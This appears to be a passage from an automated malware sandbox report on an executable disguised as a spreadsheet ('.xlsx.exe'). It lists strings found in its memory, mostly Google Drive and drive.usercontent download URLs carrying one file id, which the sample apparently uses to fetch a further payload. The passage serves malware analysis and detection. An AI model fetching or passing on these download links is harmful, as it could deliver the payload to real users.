Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.goF
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/7
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/;
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/E
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/G
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/R
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/catig
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/i
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ificate
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download2
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadz
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/letagservices-cn.com
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/qf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/r
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/recaptcha.net.cn
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/t/allowlist
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tagmanager.com
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024396004.00000000073C0000.00000004.00001000.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i#Q9
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i0
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000073F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i3
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i8
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i?Q
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iF
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69ih
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000073F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69im
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.000000000744D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69ioQ
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861710802.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iqRIq1CtXsroj69i
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3541195078.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iqRIq1CtXsroj69i87
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.000000000744D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69it
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontef
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861710802.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3541195078.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3994935047.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkx
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706592766.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861593384.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEfl
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download)t
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download4T
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download;o
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloade
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadet
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadid
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadl
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.0000000007454000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3384459717.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3352640327.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993692826.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 